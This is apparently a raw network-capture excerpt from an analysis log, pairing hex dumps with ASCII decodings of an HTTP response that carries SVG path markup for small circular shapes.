                                                                                                                                                                                                                                                                                        Data Ascii: 9,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"/><path class="cls-7" d="M591.49,234a1.92,1.92,0,0,1-.87,2.49,2.78,2.78,0,0,1-3.71-1.05,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><pa
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC3278INData Raw: 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 33 31 2c 39 34 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 30 35 2c 38 36 2e 36 34
                                                                                                                                                                                                                                                                                        Data Ascii: 1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.31,94.36a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.05,86.64
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC3294INData Raw: 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 32 38 2c 31 37 30 2e 34 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2c 31 36 32 2e 37 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 6,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644.28,170.46a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644,162.74a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC3310INData Raw: 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 32 35 2c 32 34 36 2e 35 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2c 32 33 38 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32
                                                                                                                                                                                                                                                                                        Data Ascii: "/><path class="cls-7" d="M678.25,246.56a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M678,238.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3326INData Raw: 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 36 2e 38 31 2c 39 39 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M696.81,99.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3342INData Raw: 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 30 2e 37 38 2c 31 37 35 2e 32 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                                        Data Ascii: 1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M730.78,175.26a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1.05,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"/><path class="
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3358INData Raw: 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 37 35 2c 32 35 31 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 34 39 2c 32 34 33 2e 36 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39
                                                                                                                                                                                                                                                                                        Data Ascii: 22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.75,251.36a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.49,243.64a1.92,1.92,0,0,1-.87,2.49
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3374INData Raw: 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 34 32 2c 32 35 39 2e 35 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                                        Data Ascii: .13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.42,259.54a2.16,2.16,0,0,1-1.1,2.75,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3390INData Raw: 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 31 35 2c 33 32 30 2e 36 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20
                                                                                                                                                                                                                                                                                        Data Ascii: -4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M688.15,320.61a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9"
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3406INData Raw: 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 39 2c 33 38 31 2e 36 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2c 33 37 33 61 32 2e 31 36
                                                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M722.89,381.68a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M723,373a2.16
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3422INData Raw: 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 36 32 2c 34 34 32 2e 37 36 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 37 2c 34 33 34 2e 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c
                                                                                                                                                                                                                                                                                        Data Ascii: ,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.62,442.76a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M757.7,434.08a2.15,2.15,0,0,1-1.09,2.75,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3438INData Raw: 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 38 2c 32 35 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M785.78,252a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3454INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 34 34 2c 33 32 31 2e 37 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 35 31 2c 33 31 33 2e 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37
                                                                                                                                                                                                                                                                                        Data Ascii: ath class="cls-9" d="M820.44,321.78a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M820.51,313.1a2.15,2.15,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.7
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3470INData Raw: 22 4d 38 35 35 2e 31 37 2c 33 38 32 2e 38 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 35 2e 32 35 2c 33 37 34 2e 31 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c
                                                                                                                                                                                                                                                                                        Data Ascii: "M855.17,382.86a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M855.25,374.18a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3486INData Raw: 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 39 30 2c 34 33 35 2e 32 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74
                                                                                                                                                                                                                                                                                        Data Ascii: .1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M890,435.25a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.63,2.63,0,0,1,0,3.57"/><pat
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3502INData Raw: 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2e 30 36 2c 32 35 33 2e 32 31 41 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 39 31 37 2c 32 35 36 61 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33
                                                                                                                                                                                                                                                                                        Data Ascii: 0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M918.06,253.21A2.15,2.15,0,0,1,917,256a3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3518INData Raw: 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 38 2c 33 31 34 2e 32 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39
                                                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M952.8,314.28a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3534INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 35 38 2c 32 35 31 2e 36 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 32 38 2c 32 34 32 2e 38 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30
